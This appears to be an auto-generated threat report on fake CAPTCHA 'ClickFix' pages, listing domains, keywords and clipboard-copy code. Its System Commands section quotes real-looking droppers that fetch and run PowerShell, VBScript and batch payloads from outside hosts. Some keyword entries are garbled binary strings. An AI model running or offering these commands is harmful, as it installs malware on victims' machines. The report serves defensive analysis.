← Back to Analysis

Emerging ClickGrab Campaign: Advanced Analysis of 2026-05-11 Attack Patterns

📅 Published: May 11, 2026 👨‍💻 Author: ClickGrab Threat Intelligence Team 📖 12 min read
100Sites
20%Detection
2PS Downloads

ClickGrab Threat Analysis Report - 2026-05-11

Generated on 2026-05-11 01:57:06

Executive Summary

  • Total sites analyzed: 100
  • Sites with malicious content: 20
  • Unique domains encountered: 1,125
  • Total URLs extracted: 5,724
  • PowerShell download attempts: 2
  • Clipboard manipulation instances: 87

Domain Analysis

Most Frequently Encountered Domains

  • www.maheshwaree.com: 320 occurrences
  • 98.70.13.131: 309 occurrences
  • fudgeshop.com.au: 265 occurrences
  • picsera.com: 226 occurrences
  • 18.176.47.246: 218 occurrences
  • adturekorea.co.kr: 214 occurrences
  • scillarodriguez.com: 196 occurrences
  • www.ccera-icar.org: 178 occurrences
  • senevie.com: 174 occurrences
  • www.creatorssky.com: 156 occurrences
  • devblog.ezeelogin.com: 132 occurrences
  • www.dorper.com.au: 125 occurrences
  • picsera.sirv.com: 121 occurrences
  • 104.199.248.167: 71 occurrences
  • sun1118.com: 54 occurrences

URL Pattern Analysis

reCAPTCHA imagery

8 occurrences across 5 distinct URLs

  • https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (2 times)
  • https://www.google.com/recaptcha/api.js (2 times)
  • https://2captcha.com/dist/web/assets/google-privacy-policy-Cb0CGVRT.svg (2 times)
  • https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha (1 times)
  • https://www.google.com/recaptcha/api.js?hl=&render=6Lf7uxYsAAAAANagtTWlY2ET8HF8nbfMf4-ePcWm (1 times)

Font resources

74 occurrences across 61 distinct URLs

  • https://fonts.gstatic.com (5 times)
  • https://fonts.googleapis.com (4 times)
  • https://18.176.47.246/wp-content/plugins/vk-post-author-display/vendor/vektor-inc/font-awesome-versions/src/font-awesome/css/all.min.css?ver=7.1.0 (2 times)
  • https://adturekorea.co.kr/js/font-awesome/css/font-awesome.min.css?ver=220620 (2 times)
  • https://use.fontawesome.com/releases/v5.6.3/css/all.css (2 times)
  • ...and 56 more distinct URLs

CDN hosted scripts

4 occurrences across 4 distinct URLs

  • https://cdn.jsdelivr.net/npm/three@0.167.0/build/three.module.js (1 times)
  • https://cdn.jsdelivr.net/npm/three@0.167.0/examples/jsm/ (1 times)
  • https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 (1 times)
  • https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.css?ver=1.8.1 (1 times)

Google resources

57 occurrences across 37 distinct URLs

  • https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent (11 times)
  • https://fonts.googleapis.com (4 times)
  • https://www.google (3 times)
  • https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (2 times)
  • https://www.creatorssky.com/google-adsppc/ (2 times)
  • ...and 32 more distinct URLs

Suspicious Keyword Analysis

Total Keywords Found: 483 (106 unique)

Keyword Categories

Social Engineering

44 unique keywords

  • Verification ID
  • CAPTCHA Verification
  • CaptchaCheckbox
  • Verify you are human
  • captcha_question
  • CaptchaLoading
  • captcha_word_new_400950
  • command not supportedTTL expiredConnection not allowed by SOCKSv5 serverGeneral SOCKSv5 server failure_q_emitPendingReadNotification_q_emitPendingWriteNotification_q_emitPendingConnectionNotification��d��d�d��dP-d�d�d�d$�d�d0�d6�d�d�d��d��dpd�d�!d@�d�dp�dp-d@d�d�-d &d0,d/d�d�d�d�d�dP�d�d d� d� d� d� dSocks5 host did not support authentication method.QSocks5SocketEnginePrivate::_q_controlSocketReadNotification: Unexpectedly received data while in state=%d and mode=%dRemote host closed connection###��d��d �d<�d�d�d�d�)d$�d*�d0�d6�dCan not access socks5 bind data from different thread1_q_controlSocketStateChanged(QAbstractSocket::SocketState)1_q_controlSocketDisconnected()1_q_controlSocketError(QAbstractSocket::SocketError)1_q_controlSocketBytesWritten()1_q_controlSocketReadNotification()1_q_controlSocketConnected()1_q_udpSocketReadNotification()QSocks5SocketEngine::connectToHost: in QTcpServer mode)8c���� WI)� ����QAbstractSockethostFound()connected()disconnected()stateChanged(QAbstractSocket::SocketState)error(QAbstractSocket::SocketError)proxy,authenticatorproxyAuthenticationRequired(QNetworkProxy,QAuthenticator*)connectionClosed()delayedCloseFinished()hostName,port,modeconnectToHostImplementation(QString,quint16,OpenMode)hostName,portconnectToHostImplementation(QString,quint16)disconnectFromHostImplementation()_q_connectToNextAddress()_q_startConnecting(QHostInfo)_q_abortConnectionAttempt()_q_testConnection()_q_forceDisconnect() �d�/dt�dt�dt�dt�dt�ddisconnectFromHostImplementationQAbstractSocket::SocketError(QAbstractSocket::ProxyProtocolErrorQAbstractSocket::ProxyNotFoundErrorQAbstractSocket::ProxyConnectionTimeoutErrorQAbstractSocket::ProxyConnectionClosedErrorQAbstractSocket::ProxyConnectionRefusedErrorQAbstractSocket::UnknownSocketErrorQAbstractSocket::ProxyAuthenticationRequiredErrorQAbstractSocket::UnfinishedSocketOperationErrorQAbstractSocket::UnsupportedSocketOperationErrorQAbstractSocket::SocketAddressNotAvailableErrorQAbstractSocket::AddressInUseErrorQAbstractSocket::NetworkErrorQAbstractSocket::DatagramTooLargeErrorQAbstractSocket::SocketTimeoutErrorQAbstractSocket::SocketResourceErrorQAbstractSocket::SocketAccessErrorQAbstractSocket::HostNotFoundErrorQAbstractSocket::RemoteHostClosedErrorQAbstractSocket::ConnectionRefusedErrorQAbstractSocket::SocketState(QAbstractSocket::ClosingStateQAbstractSocket::ListeningStateQAbstractSocket::BoundStateQAbstractSocket::ConnectedStateQAbstractSocket::ConnectingStateQAbstractSocket::HostLookupStateQAbstractSocket::UnconnectedStateconnectToHostImplementationquint16OpenModeh�d�:d5dgd�hd�d�d�d$�d�d0�d6�d��dT�dp@dZ�d�d�d�?dl�d�;d�;d�<d�kd@mdpdd 0d�LdOperation on socket is not supported,�d�Gd�pdqdd�XdHd��dPHd��d��d��dlocalhost.Socket is not connected1_q_abortConnectionAttempt()1_q_forceDisconnect()QAbstractSocketPrivate::_q_startConnecting() received hostInfo for wrong lookup ID %d expected %dQAbstractSocket::connectToHost() called when already looking up or connecting/connected to "%s"1_q_startConnecting(QHostInfo)QAbstractSocket::waitForBytesWritten() is not allowed in UnconnectedStateQAbstractSocket::waitForDisconnected() is not allowed in UnconnectedState��d�Gd�pdqdd�XdHd@�dPHd��d��d��d��dp�d�d��d qd�d�d�d$�d*�d0�d6�d��dT�dp@dZ�d�d�d�?dl�d�;d�;d�<d�kd@mdpdd 0d�Ld�d�Gd�pdqdd�XdHd�dPHd��d��d��dt�d��d��d��d0sd�d�d�d$�d�d0�d6�d��dT�dp@dZ�d�d�d�?dl�d�;d�;d�<d�kd@mdpdd 0d�LdQUdpSocket::hasPendingDatagrams() called on a QUdpSocket when not in QUdpSocket::BoundState�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}�}~QUdpSocket::pendingDatagramSize() called on a QUdpSocket when not in QUdpSocket::BoundStateQUdpSocket::readDatagram() called on a QUdpSocket when not in QUdpSocket::BoundState QTcpServernewConnection()QTcpServer::setSocketDescriptor() called when already listening8 d��d��dddd�hd��d@�dL d |d�{d0|d��d�d�d�d$�d�d0�d6�d�d �d��dQTcpServer::listen() called when already listening  5) g[ � � � � QLocalSocketconnected()disconnected()socketErrorerror(QLocalSocket::LocalSocketError)socketStatestateChanged(QLocalSocket::LocalSocketState)_q_notified()_q_canWrite()_q_pipeClosed()_q_emitReadyRead()� d��d�d��d�d�d�d�d$�d�d0�d6�d��dT�dp�dZ�d�d�df�dl�d0�dP�dp�d��d��d��d��d �dQLocalSocket::SocketError(QLocalSocket::UnknownSocketErrorQLocalSocket::UnsupportedSocketOperationErrorQLocalSocket::ConnectionErrorQLocalSocket::DatagramTooLargeErrorQLocalSocket::SocketTimeoutErrorQLocalSocket::SocketResourceErrorQLocalSocket::SocketAccessErrorQLocalSocket::ServerNotFoundErrorQLocalSocket::PeerClosedErrorQLocalSocket::ConnectionRefusedErrorQLocalSocket::SocketState(QLocalSocket::ClosingStateQLocalSocket::ConnectedStateQLocalSocket::ConnectingStateQLocalSocket::UnconnectedState  QLocalServernewConnection()_q_onNewConnection()%1: Name errorQLocalServer::listenQLocalServer::listen() called when already listening� d@�d8 d��dЗd��d@�d�d�d�d$�d*�d0�d6�d�d��d��dQTcpSocketAPI: WinSock v2.0 initialization failed.2activated(HANDLE)1_q_notified()� d��d��d��d��d��d�d�d$�d�d0�d6�d%1: Unknown error %2%1: Invalid name%1: Connection error1_q_emitReadyRead()1_q_pipeClosed()2canWrite()1_q_canWrite()� d��d��d��d�d�d�d�d$�d�d0�d6�d��dQLocalSocket::waitForDisconnected isn't supported for write only pipes.X d��d��d��d��dQLocalSocketPrivate::completeAsyncReadQLocalSocketPrivate::startAsyncReadQLocalSocket::waitForReadyRead WaitForSingleObject failed with error code %d.\.\pipe\QLocalSocket::connectToServer%1: %2QLocalServerPrivate::addListener1_q_onNewConnection()QLocalServerPrivate::_q_onNewConnection;|r%�����QHttpNetworkReplyreadyRead()finished()errorCode,detailfinishedWithError(QNetworkReply::NetworkError,QString)errorCodefinishedWithError(QNetworkReply::NetworkError)headerChanged()done,totaldataReadProgress(int,int)dataSendProgress(qint64,qint64)QHttpNetworkHeaderQNetworkAccessCacheentryReady(QNetworkAccessCache::CacheableObject*)`
  • captcha_sid
  • exec /i https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha";
  • ...and 34 more

Obfuscation Indicators

11 unique keywords

  • eval(script)
  • eval('var timeOut'+popupItems[i].id)
  • eval(
  • Command for the linkW!Set the Show Command for the linkWTell the link to resolve itselfWWW!Get the IconLocation for the linkW!Set the IconLocation for the linkW!Tell the link to save the changesWISetupStringTable InterfaceWWWGet string from nameWWget_SuiteCallbackWput_SuiteCallbackWget_SuiteExtensionput_SuiteExtensionICommand line argument passed to setup.exe when it's launched after rebootW*Set a shortcut property for an opened link7Retrieve any failures from applying shortcut propertiesWWW0Set a shortcut property for Run As AdministratorWW3Retrieve shortcut property for Run As AdministratorWWW.Interface ISetupDynamicLinkedLibraryControllerInstallShield LogServices ClassWWWISetupLogService Interface8Opens the Log Database from the specified Storage objectWW:Creates a new Log Database on the specified Storage object*Opens the Log Database in a read-only modeISetupLogService2 InterfaceWWWSetupMainWindow ClassWISetupMainWindow InterfaceWindow caption Window handleWShows/Hides wait cursorWWW Create windowWDestroy windowISetupWindowText Interfaceproperty Color property TextW
  • eval("clearTimeout(timeIn"+uid+")")
  • eval(frameContents)
  • eval("timeIn"+uid+" = setTimeout(function(){ li.find('> .catalog-section-childs').show(15).css({'top': top + 'px', 'left': left + 'px'}); }, 200);")
  • eval("clearTimeout(timeOut"+uid+")")
  • exec()QApplication::%s: Please instantiate the QApplication object first%L1WARNING: QApplication was not created in the main() thread.�sgqAppNameQCoreApplication: Application event filter cannot be in a different thread.QCoreApplication: Object event filter cannot be in a different thread.QCoreApplication::applicationFilePath: Please instantiate the QApplication object firstQCoreApplication::argc: Please instantiate the QApplication object firstQCoreApplication::argv: Please instantiate the QApplication object firstQCoreApplication::enter_loop: Must be called from the main threadenter_looploopLevelQCoreApplication::notify: Unexpected null receiverinstallTranslatorQCoreApplication::applicationDirPath: Please instantiate the QApplication object firstremoveTranslatorQCoreApplication::postEvent: Unexpected null receiverQCoreApplication::sendPostedEvents: Cannot send posted events for objects in another threadQCoreApplication::exit_loop: Must be called from the main threadexit_loop<�g��g��g��gP-g�g� g��g��g��g��g��g g� g�� g-testability-graphicssystem-session-style-style=-widgetcount-stylesheet-reverse-qdebug-qdevelQCoreApplication::arguments: Please instantiate the QApplication object firstQT_PLUGIN_PATHQCoreApplication::exec: The event loop is already running%s::exec: Must be called from the main threadexec��g�3g��g�3g �g4gl�g�4g::constenum class struct char shortulong longuint intunsignedconst onstQtvoidQMetaMethod::invoke: Dead lock detected in BlockingQueuedConnection: Receiver is %s(%p)
  • eval("timeOut"+uid+" = setTimeout(function(){ li.find('> .catalog-section-childs').hide(15); }, 200);")
  • ...and 1 more

System Commands

31 unique keywords

  • exec /i http://inkbookwriters.com/verify';
  • cmd.exe /c powershell -w h -ep Bypass -nop -c "$d='p.ps1';$y=$env:USERPROFILE+'\\\\Downloads\\\\'+$d;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://ghost.nestdns.com/files', $y);& $y;Remove-Item $y -Force;";`
  • command = 'cmd /c "curl -s http://178.17.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nul && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';
  • Invoke
  • cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.1"):h.Open "GET","http://198.13.158.127:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
  • const command =
  • exec()done(int)accept()reject()showExtension(bool)boolsizeGripEnabledmodalL_yeX[eP[el7ceb:e�Se@�eP|e�|e�eX7ce�S:ePQ:ej:eT:e�ee��ej{Oep{Oev{Oe|{Oe�{Oe�k:e�\:e�]:ePePtePeeP`eP`e�p:eP`eee �Fe �Fe �Fe �Fea:e�[:e�X:eP`e �Fe �Fe �Fe �Fe �Fe�n:e �Fe�ae@ eP`e�`e��e �Fe �Fe �Fe �Fe �Fe`�He�W:e Q:e0Q:eQDialog::exec: Recursive call detected�7ce�w:e�Se@�eP|e�|e`�e�7cep�6ey6e �6ex:e�6ed{OeP�6ep{Oev{Oe|{Oe�{Oe�e�s:e�s:ePe`�6e�6e`�6e��6e�6e@�6eP`e��6eК6e �Fe �Fep�6e �Fe��6ep`e`�6eP`e �Fe��6e�6e��6e��6e��6e �Fe�ae�6e��6ep�6ep�6e �Fe �Fe �Fe �Fe �Fe`�He@�7e@�6e�x6e�9ep�6e�9e&Show this message again�7cep:e`�He�8ce��:e�Se@�eP|e�|e`�eL8ceP�Ne��Ne��Ne �:e�ee��ej{Oep{Oev{Oe|{Oe�{Oe�k:e�\:e�]:ePePteP`eePePe�p:ePeee �Fe �Fe �Fe �Fea:e�[:e�X:ePe �Fe �Fe �Fe �Fe �Fe�n:e �Fe�ae@y:ePe�e��e �Fe �Fe �Fe �Fe �Fe�Hep�:e Q:e0Q:eshowMessageQString<p><b>%1</b></p>Warning:Fatal Error:Debug Message:^(.*)\(([a-zA-Z0-9_.*? +;#\-\[\]@\{\}/!<>\$%&=^~:\|]*)\)$ �� .( NI pf �� � � � �   )
  • command =powershell -c "Invoke-WebRequest -Uri 'http://95.164.53.214:5554/d.bat' -OutFile \"%temp%\d.bat\" -UseBasicParsing; Start-Process \"%temp%\d.bat\"";
  • command =cmd.exe /c powershell -w h -ep Bypass -nop -c "$d='p.ps1';$y=$env:USERPROFILE+'\\Downloads\\'+$d;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://ghost.nestdns.com/files', $y);& $y;Remove-Item $y -Force;";
  • command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.1"):h.Open "GET","http://198.13.158.127:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
  • ...and 21 more

Verification Text

3 unique keywords

  • Hidden
  • hidden
  • ray id

Technical Terms

17 unique keywords

  • .exe
  • You will observe
  • bitmap
  • CreateThread
  • Bypass
  • failed_to_retrieve
  • .bat
  • ResponseText
  • iex
  • WinHttpRequest
  • ...and 7 more

Most Frequent Keywords

  • hidden: 41 occurrences
  • robot: 35 occurrences
  • Robot: 27 occurrences
  • failed_to_retrieve: 25 occurrences
  • CAPTCHA: 16 occurrences
  • verification: 16 occurrences
  • Verification: 15 occurrences
  • CAPTCHA Verification: 14 occurrences
  • I am not a robot: 14 occurrences
  • You will observe: 14 occurrences
  • verification-id: 14 occurrences
  • To better prove you are not a robot: 14 occurrences
  • Verification ID: 13 occurrences
  • Ray ID: 12 occurrences
  • Checking if you are human: 12 occurrences

Similar Keyword Patterns

Groups of keywords that appear to be variations of the same theme:

Group 1: cmd /c "curl -s http://178.17.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nul && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';, command = 'cmd /c "curl -s http://178.17.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nul && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

Group 2: CAPTCHA Verification, CAPTCHA-verificatie-ID, Verification, verification

Group 3: Verification ID, verification-id, verification_data, verification id, Verification Hash, verification_id

Group 4: Ray ID, ray id

Group 5: CAPTCHA, captcha, captcha-badge, captcha-logo, CAPTCHA-logo, captcha-box, captcha_word, captcha_sid, captcha_0, Captcha, captcha-js, CaptchaError

JavaScript Obfuscation Analysis

Obfuscation Sophistication Score: 0/7

Potential Base64 Encoded Content

These strings may contain encoded malicious payloads:

  • connectToHostImplementation
  • controlSocketStateChanged
  • ProxyConnectionRefusedError
  • InstallerDialogCaptionMinimalDisplayNameCustomThe
  • ConnectionRefusedError

Clipboard Manipulation Analysis

Detected clipboard manipulation in 87 instances.

Document.Execcommand Copy

Found in 36 snippets (41.4% of clipboard code)

Examples:

document.execCommand('copy')

try { document.execCommand('copy')

document.execCommand("copy")

Textarea Manipulation

Found in 39 snippets (44.8% of clipboard code)

Examples:

ipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"

ng is the safe placeholder above const textarea = document.createElement('textarea'

tListener("click", function () { const textarea = document.createElement('textarea'

Complete Malicious Functions

Function 1:

function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }

Report truncated for storage. Full per-site detail is available in the scan JSON under nightly_reports/.